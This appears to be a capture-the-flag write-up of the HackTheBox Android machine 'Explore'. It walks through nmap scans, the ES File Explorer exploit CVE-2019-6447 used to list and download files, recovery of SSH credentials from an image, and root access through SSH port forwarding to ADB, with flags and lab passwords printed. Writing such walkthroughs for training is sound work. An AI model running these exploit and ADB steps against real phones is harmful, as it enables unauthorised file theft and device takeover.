# Explore Explore is an easy-rated Android machine from [HackTheBox ](https://app.hackthebox.com/machines/356)created by Bertolis. It was hard to find the exploit. I don't have previous experience with attacking Android machines. You can use Metasploit on this machine, but there are still alternatives to exploit the vulnerability. For privilege escalation, the only technique used is Port Forwarding. In the current post, my IP is 10.10.14.52, and the target IP is 10.129.188.159. ### Gathering Information First, we are going to start with checking if the machine is alive, then do the classic reconnaissance to get some general information about the target. {% code title="Local Terminal" %} ```bash ping -c 1 10.129.188.159 Pinging 10.129.188.159 with 32 bytes of data: Reply from 10.129.188.159: bytes=32 time=152ms TTL=63 Reply from 10.129.188.159: bytes=32 time=162ms TTL=63 Reply from 10.129.188.159: bytes=32 time=161ms TTL=63 Reply from 10.129.188.159: bytes=32 time=168ms TTL=63 Ping statistics for 10.129.188.159: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 152ms, Maximum = 168ms, Average = 160ms ``` {% endcode %} The machine is working, by the "Target Description" we know that is an Android device, but without that information we can think at first glance that is a Linux Machine (TTL <= 64) {% code title="Local Terminal" %} ```bash nmap -p- -sS --min-rate 5000 --open -vvv -n -Pn 10.129.188.159 -oN PortScan Nmap scan report for 10.129.188.159 Host is up, received user-set (0.16s latency). Scanned at 2023-05-08 18:34:29 Pacific SA Standard Time for 14s Not shown: 65530 closed tcp ports (reset), 1 filtered tcp port (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE REASON 2222/tcp open EtherNetIP-1 syn-ack ttl 63 42135/tcp open unknown syn-ack ttl 63 42239/tcp open unknown syn-ack ttl 63 59777/tcp open unknown syn-ack ttl 63 Read data files from: C:\Program Files (x86)\Nmap Nmap done: 1 IP address (1 host up) scanned in 14.61 seconds Raw packets sent: 70480 (3.101MB) | Rcvd: 70426 (2.817MB) ``` {% endcode %} {% code title="Local Terminal" %} ```bash nmap -sCV -p 2222,42135,42239,59777 10.129.188.159 -oN WebScan Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-09 11:43 Pacific SA Standard Time Nmap scan report for 10.129.188.159 Host is up (0.21s latency). PORT STATE SERVICE VERSION 2222/tcp open ssh (protocol 2.0) | fingerprint-strings: | NULL: |_ SSH-2.0-SSH Server - Banana Studio | ssh-hostkey: |_ 2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA) 42135/tcp open http ES File Explorer Name Response httpd |_http-title: Site doesn't have a title (text/html). |_http-server-header: ES Name Response Server 42239/tcp open unknown | fingerprint-strings: | GenericLines: | HTTP/1.0 400 Bad Request | Date: Tue, 09 May 2023 15:43:32 GMT | Content-Length: 22 | Content-Type: text/plain; charset=US-ASCII | Connection: Close | Invalid request line: | GetRequest: | HTTP/1.1 412 Precondition Failed | Date: Tue, 09 May 2023 15:43:32 GMT | Content-Length: 0 | HTTPOptions: | HTTP/1.0 501 Not Implemented | Date: Tue, 09 May 2023 15:43:37 GMT | Content-Length: 29 | Content-Type: text/plain; charset=US-ASCII | Connection: Close | Method not supported: OPTIONS | Help: | HTTP/1.0 400 Bad Request | Date: Tue, 09 May 2023 15:43:54 GMT | Content-Length: 26 | Content-Type: text/plain; charset=US-ASCII | Connection: Close | Invalid request line: HELP | RTSPRequest: | HTTP/1.0 400 Bad Request | Date: Tue, 09 May 2023 15:43:37 GMT | Content-Length: 39 | Content-Type: text/plain; charset=US-ASCII | Connection: Close | valid protocol version: RTSP/1.0 | SSLSessionReq: | HTTP/1.0 400 Bad Request | Date: Tue, 09 May 2023 15:43:54 GMT | Content-Length: 73 | Content-Type: text/plain; charset=US-ASCII | Connection: Close | Invalid request line: | ?G???,???`~? | ??{????w????<=?o? | TLSSessionReq: | HTTP/1.0 400 Bad Request | Date: Tue, 09 May 2023 15:43:55 GMT | Content-Length: 71 | Content-Type: text/plain; charset=US-ASCII | Connection: Close | Invalid request line: | ??random1random2random3random4 | TerminalServerCookie: | HTTP/1.0 400 Bad Request | Date: Tue, 09 May 2023 15:43:54 GMT | Content-Length: 54 | Content-Type: text/plain; charset=US-ASCII | Connection: Close | Invalid request line: |_ Cookie: mstshash=nmap 59777/tcp open http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older |_http-title: Site doesn't have a title (text/plain). <...> Service Info: Device: phone ``` {% endcode %} That's a lot of information, we are going to explore every http port first. * Browser:

Nothing

* Browser:

Nothing

{% code title="Local Terminal" %} ```bash whatweb http://10.129.188:159:2222 Prepare Target Failed - bad URI(is not URI?): "http://10.129.188:159:2222" whatweb http://10.129.188:159:42135 Prepare Target Failed - bad URI(is not URI?): "http://10.129.188:159:42135" ``` {% endcode %} From the basic gathering, beside than the target being a phone, thanks to the second nmap scan, we don't have a lot of relevant information. Now we have to search information about: "Banana Studio" and "ES File Explorer" to learn about the target. {% code title="Local Terminal" %} ```bash searchsploit ES File Explorer ``` {% endcode %} Output: "", we don't know if this version is vulnerable, but we doesn't lose anything by trying. {% code title="Local Terminal" %} ```bash batcat exploit.py 13 │ if len(sys.argv) < 3: # Information about how to use 14 │ print(f"USAGE {sys.argv[0]} [file to download]") 15 │ sys.exit(1) 21 │ if cmd not in cmds: # List of available commands 22 │ print("[-] WRONG COMMAND!") 23 │ print("Available commands : ") 24 │ print(" listFiles : List all Files.") 25 │ print(" listPics : List all Pictures.") 26 │ print(" listVideos : List all videos.") 27 │ print(" listAudios : List all audios.") 28 │ print(" listApps : List Applications installed.") 29 │ print(" listAppsSystem : List System apps.") 30 │ print(" listAppsPhone : List Communication related apps.") 31 │ print(" listAppsSdcard : List apps on the SDCard.") 32 │ print(" listAppsAll : List all Application.") 33 │ print(" getFile : Download a file.") 34 │ print(" getDeviceInfo : Get device info.") 35 │ sys.exit(1) ``` {% endcode %} ### Exploitation All right, let's try if it works! {% code title="Local Terminal" %} ```bash python3 exploit.py listFiles 10.129.188.159 ================================================================== | ES File Explorer Open Port Vulnerability : CVE-2019-6447 | | Coded By : Nehal a.k.a PwnerSec | ================================================================== name : lib time : 3/25/20 05:12:02 AM type : folder size : 12.00 KB (12,288 Bytes) name : vndservice_contexts time : 5/8/23 11:35:53 AM type : file size : 65.00 Bytes (65 Bytes) name : vendor_service_contexts time : 5/8/23 11:35:53 AM type : file size : 0.00 Bytes (0 Bytes) name : vendor_seapp_contexts time : 5/8/23 11:35:53 AM type : file size : 0.00 Bytes (0 Bytes) name : vendor_property_contexts time : 5/8/23 11:35:53 AM type : file size : 392.00 Bytes (392 Bytes) <...> ``` {% endcode %} It works! but there is nothing relevant here, let's try with another command. {% code title="Local Terminal" %} ```bash python3 exploit.py listPics 10.129.188.159 ================================================================== | ES File Explorer Open Port Vulnerability : CVE-2019-6447 | | Coded By : Nehal a.k.a PwnerSec | ================================================================== name : concept.jpg time : 4/21/21 02:38:08 AM location : /storage/emulated/0/DCIM/concept.jpg size : 135.33 KB (138,573 Bytes) name : anc.png time : 4/21/21 02:37:50 AM location : /storage/emulated/0/DCIM/anc.png size : 6.24 KB (6,392 Bytes) name : creds.jpg # Look what we found! This is interesting. time : 4/21/21 02:38:18 AM location : /storage/emulated/0/DCIM/creds.jpg size : 1.14 MB (1,200,401 Bytes) name : 224_anc.png time : 4/21/21 02:37:21 AM location : /storage/emulated/0/DCIM/224_anc.png size : 124.88 KB (127,876 Bytes) ``` {% endcode %} Perfect, we find the path of a credential related file, and in the 50070.py there is a command to download files. {% code title="Local Terminal" %} ```bash python3 exploit.py getFile 10.129.188.159 /storage/emulated/0/DCIM/creds.jpg ================================================================== | ES File Explorer Open Port Vulnerability : CVE-2019-6447 | | Coded By : Nehal a.k.a PwnerSec | ================================================================== [+] Downloading file... [+] Done. Saved as `out.dat`. ``` {% endcode %} {% code title="Local Terminal" %} ```bash mv out.dat out.png display out.png ``` {% endcode %}
A weird way to get receive the password, now we can try to connect through ssh {kristi : Kr1sT!5h\@Rp3xPl0r3!} {% code title="Local Terminal" %} ```bash ssh kristi@10.129.188.159 -p 2222 Unable to negotiate with 10.129.188.159 port 2222: no matching host key type found. Their offer: ssh-rsa ``` {% endcode %} {% code title="Local Terminal" %} ```bash ssh -oHostKeyAlgorithms=+ssh-rsa -oPubkeyAcceptedAlgorithms=+ssh-rsa kristi@10.129.188.159 -p 2222 # pass: Kr1sT!5h@Rp3xPl0r3! ``` {% endcode %} And we are in, now it's time to find the user flag. {% code title="Target Terminal \[u0\_a76]" %} ```bash :/ $ whoami u0_a76 :/ $ find \-name user.txt 2>/dev/null ``` {% endcode %} Nothing, this means that the flag is inside the SSD. {% code title="Target Terminal \[u0\_a76]" %} ```bash :/ $ cd sdcard :/sdcard $ ls Alarms DCIM Movies Notifications Podcasts backups user.txt Android Download Music Pictures Ringtones dianxinos :/sdcard $ cat user.txt f32017174c7c7e8f50c6da52891ae250 ``` {% endcode %} ### Privilege Escalation After exploring the whole machine, the way to solve it was by using "Port Forwarding" {% code title="Target Terminal \[u0\_a76]" %} ```bash netstat -nat Active Internet connections (established and servers) Proto Recv-Q Send-Q Local Address Foreign Address State tcp6 0 0 :::59777 :::* LISTEN tcp6 0 0 ::ffff:10.129.188:44485 :::* LISTEN tcp6 0 0 ::ffff:127.0.0.1:44491 :::* LISTEN tcp6 0 0 :::2222 :::* LISTEN tcp6 0 0 :::5555 :::* LISTEN tcp6 0 0 :::42135 :::* LISTEN tcp6 0 208 ::ffff:10.129.188.:2222 ::ffff:10.10.14.50:6518 ESTABLISHED ``` {% endcode %} If we compare with nmap, there is a new working port, the "5555", by default in android devices this port is ADB, and it's running, so we can try to use it, open a new local terminal. {% code title="Local Terminal" %} ```bash ssh -oHostKeyAlgorithms=+ssh-rsa -oPubkeyAcceptedAlgorithms=+ssh-rsa kristi@10.129.188.159 -p 2222 -L 5555:127.0.0.1:5555 # pass: Kr1sT!5h@Rp3xPl0r3! ``` {% endcode %} After connecting, you want to connect to the target port 5555, to see if is working, open a new local terminal. {% code title="Local Terminal II" %} ```bash lsof -i:5555 ``` {% endcode %} If this works, that means that you can use the port 5555 as if were yours. {% code title="Local Terminal II" %} ```bash adb connect localhost:5555 #Another way to test if is working adb -s localhost:5555 shell #With this you will connect. ``` {% endcode %} {% code title="Target Terminal \[u0\_a76]" %} ```bash su ``` {% endcode %} {% code title="Target Root" %} ```bash :/ # whoami root :/ # find -name root.txt 2>/dev/null ./data/root.txt 1|:/ # cat ./data/root.txt f04fc82b6d49b41c9b08982be59338c5 ``` {% endcode %}